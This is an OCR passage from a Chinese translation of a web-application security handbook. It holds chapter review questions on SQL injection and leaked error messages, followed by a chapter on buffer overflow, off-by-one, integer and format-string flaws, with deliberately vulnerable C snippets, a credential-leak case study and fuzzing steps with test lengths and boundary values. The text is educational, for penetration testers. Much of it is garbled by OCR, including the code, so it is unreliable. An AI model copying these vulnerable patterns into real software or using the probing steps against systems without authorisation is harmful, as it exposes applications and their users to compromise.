目 身 及 公开 资源 进行 仔细 的 核查 ， 收 集 有 助 于 发 动 攻击 的 信息 。 有 些 时 
E00 0 攻破 泄露 信息 的 应 用 程 
Fo 

















15.6 ”问题 
欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh 。 
(1) 当 探 查 SQL 注 入 漏洞 时 ， 如 果 请 求 以 下 URL: 
https: //wahh-app.com/list.aspx?artist=foo' thaving+1%3d1-- 


将 会 收 到 如 下 错误 消息 ， 


Server: Msg 170, Level 15, State 1, Line 1 
Line 1: Incorrect syntax near 'havingl'. 


从 中 可 以 得 出 什么 结论 ? r e ne 
(2) 当 对 各 种 参数 进行 模糊 测试 时 ， 应 用 程序 返回 以 下 错误 消 





Warning: mysql connect{) [function.mysal-connect]: Access denied for 
user '‘premiumdde'@'localhost' (using password: YES) in 
/hnome/doau/public_html/premiumdde/directory on line 15 

Warning: mysql_select_db({) [(function.mysqi-select-db]: Access denied 
for user 'nobody'@'localhost' (using password: NO) in 
fnome/doau/public_ html]l/premiumdde/Girectory on line 16 

Warning: mysql_select_db({} [function.mysqi-select-db]: A link to 

the server could not be established in 
fhome/doau/public_html/premiumdde/directory on line 16 

Warning: mysql _query() [function.mysal-query]: Access denied for 
user ‘nobhody'@'lecalhost' (using password: NO) in 

jnome/doau/public html/premiumdde/dGirectory on line 448 


从 中 可 以 获得 哪些 有 用 的 信息 ? 

(3) 在 解析 应 用 程序 的 过 程 中 ， 在 服务 器 上 发 现 了 一 个 激活 目录 
列表 的 隐藏 目录 ， 其 中 似乎 保存 着 大 量 以 前 用 过 的 脚本 。 请 求 其 中 一 个 
脚本 返回 以 下 错误 消息 : 








CGlWrap Error: Execution of this script not permitted 
Execution of [{contact.pl}) is not permitted for the following reason: 


Script is not executable. Issue ‘chmod 755 filename’ 


Local Information and Documentation: 
CGIwrap Docs: http://wahh-app.com/cgiwrap-docs/ 
Contact EMail: helpdesk@wahh-app.com 


Server Data: 
Server Administrator/Contact: helpdesk@wahh-app.com 
Server Name: wahh-app.com 
Server Port: 80 
Server Protocol: HETTP/1.1 
Request Data: 
User Agent/Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 
5.1; .NET CLR 2.0.50727; FDM; InfoPath.1; .NET CLR 1.1.4322) 
Request Method: GET 
Remote Address: 192.168.201.19 
Remote Port: 57961 
Referring Page: http://wahh-app.com/cgi-bin/cgiwrap/fodd 
是 什么 原因 造成 了 这 个 错误 ? 可 以 立即 发 现 哪 些 第 见 的 Web 应 用 程 
序 漏洞 ? 
(4) 在 探查 一 个 请 求 参数 的 功能 并 试图 确定 它 在 应 用 程序 中 的 作 
用 时 ， 如 果 请 求 以 下 URL: 
https://wahh-app.com/agents/checkcfg. php ?name=admin&id=13&log=1 
应 用 程序 将 返回 以 下 错误 消息 : 


Warning: mysql_connect{) [function.mysal-connect]: Can't connect to 
MySQL server on ‘admin' (10013) in 








/var/local/www/include/dbconfig.php on line 23 


这 条 错误 消息 是 由 什么 原因 造成 的 ? 为 此 应 探查 什么 漏洞 ? 

(5) 当 模 类 测试 一 个 请 求 ， 看 其 中 是 否 存在 各 种 漏洞 时 ， 测 试 员 
轮流 在 每 个 请 求 参数 中 提交 了 一 个 单 引 号 。 其 中 一 个 请 求 的 啊 应 包含 了 
一 个 HTTP 500 状 态 码 ， 表 示 应 用 程序 可 能 存在 SQL 注 入 漏洞 。 消 奶 的 全 
部 内 容 如 下 : 


Microsoft VBScript runtime error '800a000d' 
Type mismatch: ' [string: "'"]' 











/scripts/confirmOrder.asp, line 715 


该 应 用 程序 是 人 否 易于 受到 攻击 ? 
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过 去 ， 在 本 地 执行 环境 中 运行 的 编译 型 软件 一 直 受到 缓冲 区 溢出 
与 格式 化 字符 串 〈format string) 等 漏洞 的 困扰 。 如 今 ， 绝 大 多 数 的 Web 
应 用 程序 都 是 使 用 在 托管 执行 环境 中 运行 的 语言 和 平台 编写 的 ， 这 个 环 
境 中 不 存在 上 述 典型 漏洞 。 使 用 C# 和 Java 这 类 语言 的 一 个 主要 优点 在 
于 ， 程 序 员 不 必 再 担心 缓冲 区 管理 与 指针 算法 等 问题 ;这 些 问 题 曾 给 以 
本 地 语言 《如 C 和 C++) 开发 的 软件 造成 重大 影响 ， 并 且 是 这 些 软件 中 
绝 大 多 数 严重 漏洞 的 根源 所 在 。 

但 是 ， 有 时 也 会 遇 到 用 本 地 代码 编写 的 Web 应 用 程序 。 而 且 ， 许 多 
主要 使 用 托管 代码 编写 的 应 用 程序 同样 包含 本 地 代码 或 调用 在 非 托管 环 
境 中 运行 的 外 部 组 件 。 除 非 渗透 测试 员 确 切 地 知道 所 针对 的 应 用 程序 并 
不 包含 任何 本 地 代码 ， 否 则 就 有 必要 对 它 进行 一 些 基本 的 检查 ， 查 明 其 
中 是 否 存在 任何 常见 的 漏洞 。 

在 打印 机 与 交换 机 等 硬件 设备 上 运行 的 Web 应 用 程序 常常 使 用 某 种 
本 地 代码 。 其 他 可 能 的 目标 包含 : 任何 其 名 称 〈 如 dl 或 exe) 表示 它 使 
用 了 本 地 代码 的 页 面 或 脚本 ， 以 及 任何 已 知 调用 遗留 外 部 组 件 的 功能 
《如 日 志 机 制 ) 。 如 果 认 为 所 攻击 的 应 用 程序 包含 大 量 的 本 地 代码 ， 那 
么 就 有 必要 对 应 用 程序 处 理 的 每 个 用 户 提 交 的 数据 进行 测试 ， 包 括 每 个 
参数 的 名 称 与 参数 值 、cookie、 请 求 消息 头 及 其 他 数据 。 

本 章 主 要 介绍 3 种 典型 的 软件 漏洞 : 缓冲 区 洲 出 、 整 数 漏洞 和 格式 
化 字符 串 漏洞 。 对 每 一 种 情况 ， 我 们 将 首先 描述 一 些 常见 的 漏洞 ， 然 后 
说 明 在 web 应 用 程序 中 探查 这 些 漏洞 所 需 采 取 的 实际 步骤 。 这 个 主题 涉 
及 的 内 容 非 常 广 ， 它 不 在 本 书 讨论 的 范围 之 内 。 关 于 本 地 软件 漏洞 ， 要 
想 了 解 更 多 详细 信息 及 如 何 发 现 它 们 ， 我 们 推荐 以 下 参考 书 。 

口 Jpe Shellcoder's Handbook, 2nd Edition, by Chris Anley, John 
Heasman, Felix Linder, and Gerardo Richarte (Wiley, 2007) 

DQ The Art of Software Security Assessment by Mark Dowd, John 














McDonald, and Justin Schuh(Addison-Wesley, 2006) 
口 Cray Hat Hacking, 2nd Edition, by Shon Harris, Allen Harper, Chris 
Eagle, and Jonathan Ness(McGraw-Hill Osborne, 2008) 


EY 





=> Ef 本 章 描 述 的 漏 调 远 程 探 得 可 能 会 给 应 用 程序 带 来 严 

重 的 拒绝 服务 风险 。 与 验证 机 制 不 完善 及 路 径 过 有 历 等 漏洞 不 同 ， 仪 
查找 各 种 典型 的 软件 漏洞 也 可 能 会 在 目标 应 用 程序 中 造成 无 法 处 理 
的 异常 ， 导 致 应 用 程序 终止 运行 。 如 果 准 备 在 一 个 现 有 的 应 用 程序 
中 探查 这 些 漏洞 ， 在 开始 测试 前 ， 必 须 确 保 应 用 程序 所 有 者 接受 测 
试 带 来 的 风险 。 








如 果 应 用 程序 将 用 户 可 控制 的 数据 复制 到 一 个 不 足以 容纳 它们 的 内 
存 缓存 区 中 ， 就 会 出 现 缓冲 区 溢出 漏洞 。 由 于 目标 缓冲 区 溢出 ， 导 致 邻 
近 的 内 存 被 用 户 数据 重 写 。 攻 击 者 可 以 根据 漏洞 的 特点 利用 它 在 服务 右 
上 运行 任意 代码 或 执行 其 他 未 授权 操作 。 多 年 来 ， 绥 冲 区 次 出 漏洞 一 直 
Ce er FP AMA AK EID BC Wh IE BSR ZS 
政 "。 











16.1.1 Seva tH 


如 果 应 用 程序 在 未 确定 大 小 固定 的 缓冲 区 容量 足够 大 之 前 ， 就 使 用 
一 个 无 限制 的 复制 操作 (如 C 语 言 中 的 strcpy) 将 一 个 大 小 可 变 的 缓冲 区 
复制 到 男 一 个 大 小 固定 的 缓冲 区 中 ， 往 往 束 会 造成 缓冲 区 洲 出 。 例 如 ， 
a 的 函数 将 字符 串 username 复 制 到 一 个 分 配 到 栈 上 的 大 小 固定 的 缓冲 
XA; 


bool CheckLogin(char* username, char* password) 
{ 
char _username[32]; 


strcpy{( username, username); 


如 果 字 符 串 username 超 过 32 个 字符 ，_username 绥 冲 区 就 会 游 出 ， 攻 
击 者 将 重 写 邻近 内 存 中 的 数据 。 

在 成 功利 用 栈 绥 冲 区 溢出 漏洞 的 攻击 中 ， 攻 击 者 通常 能 够 重 写 栈 上 
已 保存 的 返回 地 址 。 当 调用 CheckLogin 函 数 时 ， 处 理 器 将 调用 函数 后 执 
行 的 指令 地 址 写 入 栈 。 结 束 CheckLogin 函 数 后 ， 处 理 器 从 栈 中 取出 这 个 
地 址 ， 返 回执 行 这 个 指令 。 同 时 ，CheckLogin 函 数 分 配 到 栈 上 已 保存 的 
返回 地 址 劳 边 的 _username 绥 冲 区 。 如 果 攻 击 者 能 够 令 _username 绥 冲 区 
洲 出 ， 他 束 能 用 他 选择 的 一 个 值 重 写 缓冲 区 已 保存 的 返回 地 址 ， 让 处 理 
器 访问 这 个 地 址 ， 从 而 执行 任意 代码 。 


16.1.2” 堆 湾 出 








从 本 质 上 讲 ， 堆 缓冲 区 淤 出 也 是 由 前 面 描述 的 相同 危险 操作 造成 
E E a T 


bool CheckLogin(char* username, char* password) 


char* username = (char*) malloc(32); 


strcepy (_username, username); 











a, TEMES MH, HRR K ANE CATER I 
而 是 其 他 以 堆 控 制 结构 分 阳 的 堆 内 存 块 。 堆 以 一 个 双 同 链接 表 的 形式 执 
47: 在 内 存 中 ， 每 个 块 的 前 面 是 一 个 控制 结构 ， 其 中 包含 块 的 大 小 、 一 
个 指 回 堆 上 前 一 个 块 的 指针 以 及 一 个 指向 堆 上 后 一 个 块 的 指针 。 妆 堆 绥 
冲 区 溢出 时 ， 邻 近 的 堆 块 的 控制 结构 被 用 户 控 制 的 数据 重 写 。 

与 栈 溢出 漏洞 相 比 ， 利 用 这 种 漏洞 实施 攻击 要 更 困难 一 些 ， 但 是 ， 
一 种 常见 的 利用 方法 是 在 被 重 写 的 堆 控 制 结构 中 写 入 专门 设计 的 值 ， 以 
在 将 来 某 个 时 间 重 写 任何 一 个 关键 的 指针 。 控 制 结构 已 被 重 写 的 堆 块 从 
内 存 中 释放 后 ， 堆 管理 器 需要 更 新 堆 块 的 链接 表 。 要 完成 这 项 任务 ， 它 
需要 更 新 后 一 个 堆 块 的 反 向 链接 指针 ， 并 更 新 前 一 个 堆 块 的 正 癌 链接 指 
针 ， 以 便 链接 表 中 的 这 两 个 指针 指向 彼此 。 为 此 ， 堆 管理 絮 使 用 被 重 写 
的 控制 结构 中 的 值 。 具 体 来 说 ， 为 更 新 后 一 个 块 的 反问 链接 指针 ， 堆 管 
理 右 废弃 被 重 写 的 控制 结构 中 的 正 癌 链接 指针 ， 并 在 这 个 地 址 的 结构 中 
写 入 被 重 写 的 控制 结构 中 的 反 向 链接 指针 的 值 。 换 句 话 说 ， 它 在 一 个 用 
户 控 制 的 地 址 中 写 入 一 个 用 户 控制 的 值 。 如 果 攻 击 者 精心 设计 了 他 的 洲 
出 数据 ， 他 就 能 用 他 选择 的 值 重 写 内 存 中 的 任何 指针 ， 其 目的 是 控制 指 
针 的 执行 路 径 ， 从 而 执行 任意 代码 。 通 常 ， 指 针 重 写 的 主要 目标 是 随后 
被 应 用 程序 调用 的 函数 指针 的 值 ， 或 者 十 在 下 次 出 现 异常 时 被 调用 的 卉 
常 处 理 器 的 地 址 。 











ET 
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=> 注解 最 新 的 编译 器 与 操作 系统 已 经 采取 了 各 种 措施 对 软 
件 进行 保护 ， 防 止 编程 错误 导致 缓冲 区 洲 出 。 这 表示 ， 如 今 现 实 世 
界 中 的 溢出 漏洞 往往 比 这 里 描述 的 示例 更 难以 利用 。 要 想 了 解 更 多 
有 关 这 些 漏洞 的 防御 措施 及 避 开 它们 的 方法 ， 请 参阅 The 
Shellcoder's Handbook 一 书 。 





如 采编 程 错 误 使 得 攻击 者 可 以 在 一 个 被 分 配 的 缓冲 区 之 后 写 入 一 个 
字 节 《或 少数 儿 字 节 ) ， 就 会 发 生 一 种 特殊 的 溢出 漏洞 。 

以 下 面 的 代码 为 例 ， 它 在 栈 上 分 配 一 个 缓冲 区 ， 执 行 一 项 计数 缓冲 
区 复制 操作 ， 然 后 以 空 字 节 结束 目标 字符 串 : 


bool CheckLogin(char* username, char* password) 








f 
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char _username[32]; 


int i; 

for {i = 0; username[i]) && i < 32; i++) 
_username[i] = username[i]; 

_username[i] = 0; 


这 段 代 码 复 制 32 B， 然 后 增加 空 终 止 符 。 因 此 ， 如 果 用 户 名 为 32 B 
或 更 长 ， 空 字 节 就 会 写 在 缓冲 区 之 外 ，“ 污 染 ”* 邻 近 的 内 存 。 这 种 条 件 可 
被 攻击 者 加 以 利用 : 如 果 栈 上 邻近 的 数据 是 调用 帧 〈calling frame) 的 
己 保存 的 帧 指针 (saved frame pointer) ， 那 么 将 低位 字 节 设 为 零 可 能 会 
导致 它 指 同 _username 绥 冲 区 ， 因 而 指 问 攻击 者 控制 的 数据 。 当 调用 的 
函数 返回 时 ， 攻 击 者 就 可 以 控制 执行 流程 。 

如 果 开 发 者 忽略 在 字符 串 缓 冲 区 中 为 一 个 空 字 市 终止 符 预 留 空 间 ， 
这 时 也 会 出 现 一 种 与 上 面 的 漏洞 类 似 的 漏洞 。 下 面 以 前 面 扒 溢出 漏洞 
的 “修复 ”代码 为 例 : 


bool CheckLogin(char* username, char* password) 


{ 





char* _username = {char*) malloc(32); 


strncpy({_username, username, 32); 


在 这 段 代 码 中 ， 程 序 员 在 堆 上 建立 一 个 固定 大 小 的 缓冲 区 ， 然 后 执 
行 一 个 计数 缓冲 区 复制 操作 ， 则 在 确保 缓冲 区 不 会 溢出 。 然 而 ， 如 果 用 
户 名 比 缓冲 区 更 长 ， 那 么 缓冲 区 内 惑 会 完全 填充 用 户 名 中 的 字符 ， 再 没 
有 空间 在 最 后 附加 一 个 空 字 节 。 因 此 ， 复 制 到 组 冲 区 中 的 字符 串 惑 
SER CWR RIEN. 

一 些 语言 《如 C) 并 不 单独 记录 一 个 字符 串 的 长 度 ， 字 符 串 结束 部 
分 用 一 个 空 字 市 表示 (也 就 是 说 ， 用 和 霉 的 ASCII 字 符 编 码 表示 ) 。 如 果 








一 个 字符 串 “丢失 ”了 它 的 空 终止 符 ， 它 的 长 度 就 会 增加 ， 并 一 直到 内 存 
的 下 一 个 字 节 它 磁 巧 为 零 ) 结束 。 这 种 无 意 的 结果 经 常会 在 应 用 程序 





中 造成 及 常 行为 与 漏洞 。 





我 们 曾 在 一 个 硬件 设备 的 Web 应 用 程序 中 发 现 这 种 漏洞 。 该 应 用 程 
序 包 含 一 个 页 面 ， 它 接受 POST 请 求 的 任意 参数 ， 并 返回 HTML 表 单 ， 
其 中 以 隐藏 字段 的 形式 包含 那些 参数 的 名 称 与 参数 值 。 例 如 : 


elay.cqi HTTP/1. 


Content-Length: 3 


azb 
HTTP/1. K 
Date: iU, = 2 1 n a 1 
Content-Type: text/htm 
ontent-Le 278 
<htm 
<head 


<meta http-ecuive"*content-type”" 
</head> 
<form name="FORM_RELAY" actior 
<input type=*hidden” name="a" value="b"> 

f f 
<body onLoad="document .FORM_RELAY .submit{); "> 
</pody> 


</ntml> 


="“page.cgi" metho 


content="text/html;charset=iso-8859-1"> 


d="POST*> 
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入 ， 其 中 许多 为 敏感 数据 。 然 而 ， 如 采用 户 提交 的 数据 等 于 或 超过 4096 
B， 那 么 返回 的 表单 中 还 包括 在 癌 页 面 提 出 的 前 一 个 请 求 中 提交 的 参 


数 ， 即 使 这 些 参数 由 另外 一 名 用 户 提 区 。 





例如 : 


POST /formRelay.cgi HTTP/1.0 


Content-Length: 4096 


a=bbbbbbbbbbbbb [lots more b's] 


I'l ee Se K 
t THU 1 SEP 2011 1 M'I 
nt-Type: text/html 
t-Length: 459 
tml> 
ead> 
meta hAttp-equi tent-type' ntent=*text/html;charset= > > 
ead 
“form name=""ORM_ RELAY" acticn="*page.cgi’ method="POST"> 
<input type="hidden" rame="a" value-"bbbbbbbbhbbbbb[ lots more b‘s]"> 
<input type="hidden" name="strUsername" valuet"agqriffiths"> 
input type="hidden" ama="strPa rd a ="a 1er 
input tyr iden’ 41 Og_i je="Log+In"> 
form 
<body onLcoad="document .FORM_RELAY. submit {}; "> 
/bedy 
</html> 
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确定 这 种 漏洞 后 ， 我 们 就 可 以 继续 同 这 个 易 受 攻击 的 页 面 提交 超 长 


的 数据 ， 解 析 收 到 的 响应 ， 记 录 其 他 用 户 提交 给 页 面 的 每 一 个 数据 ， 包 
括 登 录 证 书 和 其 他 敏感 信息 。 

造成 这 种 漏洞 的 根本 原因 是 ， 在 4096 B 的 内 存 块 中 ， 用 户 提交 的 数 
据 被 保存 为 以 空 字 节 终止 的 字符 串 。 这 些 数据 被 复制 到 一 个 检验 操作 
中 ， 因 此 不 会 直接 造成 溢出 。 然 而 ， 如 果 提 交 的 是 超 长 的 输入 ， 复 制 操 
作 就 会 导致 空 终止 符 “ 丢 失 ”， 因 而 字符 串 会 “流入 ”到 内 存 邻 近 的 数据 
中 。 因 此 ， 当 应 用 程序 解析 请 求 参数 时 ， 它 会 一 直 解 析 到 下 一 个 空 字 节 
为 止 ， 因 此 就 会 解析 出 其 他 用 户 提 交 的 参数 。 











同一 个 确定 的 目标 友 送 较 长 的 字符 串 并 监控 反常 结果 是 查找 缓冲 区 
液 出 漏洞 的 基本 方法 。 有 些 时 候 ， 一 些 细微 的 漏洞 只 有 通过 发 送 一 个 特 
殊 长 度 或 者 在 较 小 的 长 度 范 围 内 的 超 长 字符 串 才 能 检测 出 来 。 但 是 ， 许 
A ee a eee mee Ula 
但 出 漏洞 。 

程序 员 常 常 使 用 十 进 制 或 十 六 进 制 的 约 整 数 ( 如 32、100、1024、 
4096 等 ) 来 创建 固定 大 小 的 缓冲 区 。 在 应 用 程序 中 探查 明显 漏洞 的 一 个 
简单 方法 就 是 ， 癌 确定 的 每 一 个 目标 数据 发 送 超 长 字符 串 ， 然 后 监控 服 
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渗透 测试 步 又 


D 回 每 一 个 目标 数据 提交 一 系列 稍 大 于 第 用 缓冲 区 大 小 的 
长 字符 串 。 例 如 : 


1100 
4200 
33000 


(2) 一 次 针对 一 个 数据 实施 攻击 ， 最 大 程度 地 履 盖 应 用 程序 
中 的 所 有 代码 路 径 。 

(3) 可 以 使 用 Burp Intruder FAY AF ERA CA eT RV SE 
成 各 种 大 小 的 有 效 载荷 。 

(4) 监控 应 用 程序 的 啊 应 ， 确 定 所 有 反 负 现象。 无 法 控制 的 
溢出 几乎 可 以 肯定 会 在 应 用 程序 中 引起 异常 。 在 远程 进程 中 探测 何 
时 出 现 这 种 异常 相当 困难 ， 需 要 寻找 的 反常 现象 包括 以 下 几 项 。 
口 HTTP 500 状 态 码 或 错误 消息 ， 这 时 其 他 畸形 (而 非 超 长 〉， 输 
入 不 会 产生 相同 的 结果 。 

口 内 容 详细 的 消息 ， 表 示 某 个 本 地 代码 组 件 发 生 故 障 。 

口 服务 器 收 到 一 个 局 部 或 畸形 啊 应 。 

口 服务器 的 TCP 连接 未 返回 啊 应 ， 突 然 关 闭 。 

口 整 个 web 应 用 程序 停止 啊 应 。 

(5) 注意， 如 果 一 个 堆 滋 出 被 触发 ， 这 可 能 会 在 将 来 而 非 立 
即 导 致 系统 裔 溃 。 因 此 ， 必 须 进 行 实验 ， 确 定 一 种 或 几 种 造成 
堆 “ 腐 化 ”的 测试 字符 串 。 

(6)“ 一 位 偏 移 ” 漏 润 可 能 不 会 造成 系统 骨 江 ， 但 可 能 会 导致 
反常 行为 ， 如 应 用 程序 返回 意外 的 数据 。 


有 些 时 候 ， 测 试 字符 捉 可 能 会 被 应 用 程序 自身 或 其 他 组 件 (如 Web 
服务 器 〉 实 施 的 输入 确认 检查 所 阻止 。 在 URL 查 询 字符 串 中 提交 超 长 数 
据 时 通常 会 出 现 这 种 情况 ， 应 用 程序 会 在 针对 每 个 测试 字符 串 的 啊 应 中 
以 “URL 过 长 ”之 类 的 常规 消 奶 反映 这 一 点 。 在 这 种 情况 下 ， 应 当 进 行 实 
验 ， 确 定 URL 人 允许 的 最 大 长 度 〈 一 般 约 为 2000 个 字符 ) ， 并 调整 缓冲 区 
大 小 ， 以 使 测试 字符 串 符合 这 个 要 求 。 但 是 ， 即 使 实施 了 常规 过 滤 ， 洲 





























i la 因为 长 度 足 够 短 、 能 够 避 开 这 种 过 滤 的 字符 串 也 可 能 
Tint HH o 

其 他 情况 下 ， 过 滤 机 制 可 能 会 限制 在 一 个 特定 参数 中 提交 的 数据 类 
型 或 字符 范围 。 例 如 ， 当 将 提交 的 用 户 名 传送 给 一 个 包 合 洪 出 漏洞 的 功 
能 时 ， 应 用 程序 可 能 会 确认 该 用 户 名 是 否 仪 包含 字母 数字 字符 。 为 实现 
测试 效率 最 大 化 ， 渗 透 测 试 员 应 当 设 法 确保 每 个 测试 字符 串 仅 包含 相关 
参数 允许 的 字符 。 满 足 这 种 要 求 的 一 个 有 效 方法 是 ， 和 截获 一 个 包含 应 用 
程序 所 接受 的 数据 的 正常 请 求 ， 然 后 使 用 其 中 已 经 包含 的 相同 类 型 的 字 
符 ， 创 建 一 个 可 能 通过 任何 基于 内 容 的 过 滤 的 长 字符 串 ， 再 使 用 这 个 字 
符 串 轮流 测试 每 一 个 目标 参数 。 

即使 确信 应 用 程序 中 存在 绥 冲 区 洲 出 漏洞 ， 但 是 ， 要 远程 利用 它 执 
行 任意 代码 仍然 极其 困难 。NGSSoftware 公 司 的 Peter Winter-Smith 就 盲 
目 缓冲 区 溢出 利用 的 可 能 性 进行 了 一 些 有 趣 的 研究 。 欲 知 详情 ， 请 参阅 
以 下 内 容 : www.ngssoftware.com/papers/NISR.BlindExploitation.pdf. 
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会 出 现 与 整数 有 关 的 漏洞。 有 了 两 种 类 型 的 漏洞 最 值得 关注 :整数 洲 出 与 


符号 错误 。 
16.2.1 aya tt 

当 对 一 个 整数 值 进行 操作 时 ， 如 果 整 数 大 于 它 的 最 大 可 能 值 或 小 于 
它 的 最 小 可 能 值 ， 就 会 造成 整数 洪 出 漏洞 。 这 时 ， 数 字 就 会 “ 回 绕 ”， 使 


一 个 非常 大 的 数字 变 得 非常 小 ， 或 者 与 之 相反 。 
下 面 以 前 面 堆 溢 出 漏洞 的 “修复 ”代码 为 例 : 


bool CheckLogin(char* username, char* password) 





unsigned short len = strlen(username) + 1; 
char* username = {char*) malloc{len); 


strepy(_username, username); 
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长 度 安 置 字符 串 最 后 的 空 字 节 ， 表 给 它 分 配 一 个 相应 长 度 的 缓冲 区 ， 然 
后 将 用 户 名 复制 到 这 个 缓冲 区 内 。 如 果 使 用 正常 长 度 的 输入 ， 这 段 代 码 
束 能 够 正 党 运行。 但是， 如 果 用 户 提 交 一 个 65 535 个 字符 的 用 户 名 ， 束 
会 造成 整数 溢出 。 一 个 长 度 较 短 的 整数 包含 16 位 ， 它 足以 保存 0~65 535 
之 间 的 值 。 如 果 提 交 一 个 长 度 为 65 535 的 字符 串 ， 程 序 会 在 这 个 字符 串 
后 面 增加 一 个 长 度 ， 使 得 这 个 值 “ 回 绕 ” 而 变 为 0。 于 是 应 用 程序 为 它 分 
配 一 个 长 度 为 0 的 缓冲 区 ， 把 用 户 名 复制 到 它 里 面 ， 因 而 造成 堆 洲 出 。 
Be en ae NS PTA SRE 0 


16.2.2 ”符号 错误 


如 采 应 用 程序 使 用 有 符号 和 无 符号 的 整数 来 表示 缓冲 区 的 长 度 ， 并 
且 在 茶 个 地 方 混 消 这 两 个 整数 ， 或 者 将 一 个 有 符号 的 值 与 无 符号 的 值 进 





























行 直 接 比较 ， 或 者 问 一 个 仪 接受 无 符 写 的 值 的 函数 参数 提交 有 符 写 的 
值 ， 都 会 出 现 符号 错误 。 在 上 述 两 种 情况 下 ， 有 符号 的 值 都 会 被 当做 其 
对 应 的 无 符号 的 值 处 理 ， 也 就 是 说 ， 一 个 负数 变 成 一 个 大 正 数 。 

下 面 以 前 面 栈 溢出 漏洞 的 修复 “代码 ”为 例 : 





bool CheckLogin(char* username, int len, char* password) 
{ 

char _username[32] = ""; 

if {len < 32) 


strncpy(_username, username, len); 
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号 整数 为 参数 。 程 序 员 在 栈 上 建立 一 个 固定 大 小 的 缓冲 区 ， 检 查 用 户 名 
的 长 度 是 否 小 于 缓冲 区 的 大 小 ， 如 果 是 这 样 ， 就 执行 计数 缓冲 区 复制 ， 
确保 缓冲 区 不 会 洲 出 。 

如 末 len 参 数 为 负数 ， 这 段 代 码 就 能 够 正常 运行 。 然 而 ， 如 果 攻 击 
者 能 够 癌 函 数 提交 一 个 负 值 ， 那 么 程序 员 的 保护 性 检查 就 会 失效 。 仍 然 
可 以 成 功 将 它 与 32 进 行 比较 ， 因 为 编译 喜 会 把 这 两 个 数字 当做 有 符号 的 
整数 处 理 。 因 此 ， 这 个 负 值 被 提交 给 strncpy 函 数 ， 成 为 它 的 计数 函数 。 
因为 stmcpy 仅 接受 无 符号 的 整数 为 参数 ， 所 以 编译 器 将 len 值 隐 仿 地 转换 
成 这 种 类 型 ， 因 而 负 值 被 当做 一 个 大 的 正 数 处 理 。 如 采用 户 提 交 的 用 户 
a a 
ZR. 

通常 ， 实 施 这 种 攻击 必须 满足 一 个 前 握 ， 即 长 度 参数 由 攻击 者 直接 
控制 。 例 如 ， 它 由 客户 端 JavaScript 计 算 ， 并 在 请 求 中 将 它 所 属 的 字符 串 
一 起 提交 。 但 是 ， 如 果 整 数 变量 足够 小 〈 例 如， 非常 短 ) ， 且 程序 在 服 
务 句 端 计算 它 的 长 上 度 ， 那 么 攻击 者 仍然 可 以 通过 向 应 用 程序 提交 一 个 超 
长 的 字符 串 ， 借 由 整数 溢出 引入 一 个 负 值 。 

















目 然 地 ， 任 何 时 候 ， 只 要 客户 端 回 服务 器 提交 整数 值 ， 我 们 就 可 以 
在 这 些 位 置 探查 整数 漏洞 。 通 常 这 种 行为 及 生 在 以 下 两 种 不 同 的 情况 


Fe 
口 应 用 程序 通过 查询 字符 串 参 数 、cookie 或 消息 主体 ， 以 正常 形式 
提交 人 整数 值 。 这 些 数字 一 般 使 用 标准 的 ASCII 字符 ， 以 十 进 制 表示 。 这 
时 ， 表 示 一 个 同样 被 提交 的 字符 串 长 度 的 字段 是 我 们 测试 的 主要 目标 。 
口 另外， 应 用 程序 可 能 提交 时 入 到 二 进 制 数据 巨 对 象 中 的 整数 值 。 











REED AT aU Nee PZ PE, ActiveX tet, Ba Pig 
在 隐藏 表单 字段 或 cookie 中 传送 〈 请 参阅 第 5 草 了 解 相 关内 容 ) 。 在 这 种 
情况 下 ， 与 长 度 有 关 的 整数 漏洞 更 难以 发现。 它们 一 般 以 十 六 进 制 的 形 
式 表示 ， 通 第 出 现在 与 其 关联 的 字符 串 或 缓冲 区 之 前 。 请 注意 ， 上 述 二 
P E 以 便于 通过 HTTP 传 

















渗透 测试 步 又 


(1) 确定 测试 目标 后 ， 需 要 提交 适当 的 有 效 载 荷 ， 以 触发 任 
何 漏洞 。 轮 流 辐 每 一 个 目标 数据 发 送 一 系列 不 同 的 值 ， 分 别 表示 不 
同 有 符号 与 无 符号 整数 值 的 边界 情况 。 例 如 : 
口 0x7f 与 0x80 (127 与 128) 
口 0xff 与 0x100 (255 与 256) 
口 0x7ffff 与 0x8000 (32 767 与 32 768) 
口 Oxffff 与 0x10000 (65 535 与 65 536) 
Ox7fffffff 与 0x80000000 (2 147 483 647 与 2 147 483 648) 
口 Oxffffffff 与 0x0 (4 294 967 295 与 0) 

(2) 如 果 被 修改 的 数据 以 十 六 进 制 表示 ， 应 该 发 送 每 个 测试 
字符 串 的 little-endian 与 big-endian 版 本 出 ， 例 如 ，ff7f 及 7fff。 如 果 
十 六 进 制 数字 以 ASCII 形 式 提 交 ， 应 该 使 用 应 用 程序 自身 使 用 的 字 
母 字符 ， 确 保 这 些 字 符 被 正确 编码 。 

(3) 与 上 述 查 找 缓冲 区 溢出 漏洞 时 一 样 ， 应 该 监控 应 用 程序 
啊 应 中 出 现 的 反常 事件 。 

















如 采用 户 可 控制 的 输入 被 当做 格式 化 字符 串 参 数 提交 给 一 个 接受 可 
能 被 滥用 的 格式 说 明 符 的 函数 〈 如 C 语 言 中 的 printf 系 列 函数 ) ， 就 会 产 
生 格 式 化 字符 串 漏 洞 。 这 些 函 数 接受 的 参数 数量 不 定 ， 其 中 可 能 包含 不 
同 的 数据 类 型 ， 如 数字 和 字符 串 。 提 交 给 函数 的 格式 化 字符 串 中 包含 的 
We 
式 表 示 。 
_ 例如 ， 下 面 的 代码 输出 一 条 包含 以 十 进 制 表示 的 count 变 量 值 的 消 


printf£("The value of count is $d", count.}; 


最 危险 的 格式 说 明 符 为 %n。 这 个 说 明 符 不 会 导致 什么 数据 被 打 
印 。 相 反 ， 它 使 已 经 输出 的 字 节 数量 被 写 入 到 以 相关 变量 参数 提交 给 函 
数 的 指针 地 址 中 。 例 如 : 


int count = 43; 





int written = 0; 
printf("The value of count is %*d%n.\n", count, é&written.); 
printf("%d bytes were printed.\n", written); 


它 输出 : 
The value of count is 43. 
24 bytes were printed. 


如 果 格 式 化 字符 串 中 的 说 明 符 比 提交 给 函数 的 变量 参数 多 ， 而 函数 
叉 无 法 探查 到 这 一 点 ， 那 么 它 束 会 继续 处 理 调 用 栈 中 的 参数 。 

如 果 攻 击 者 能 够 控制 提交 给 printf 之 类 函数 的 全 部 或 部 分 格式 化 字 
符 吝 ， 他 就 可 以 利用 上 述 行为 重 写 进程 内 存 的 重要 部 分 ， 并 最 终 执 行 任 
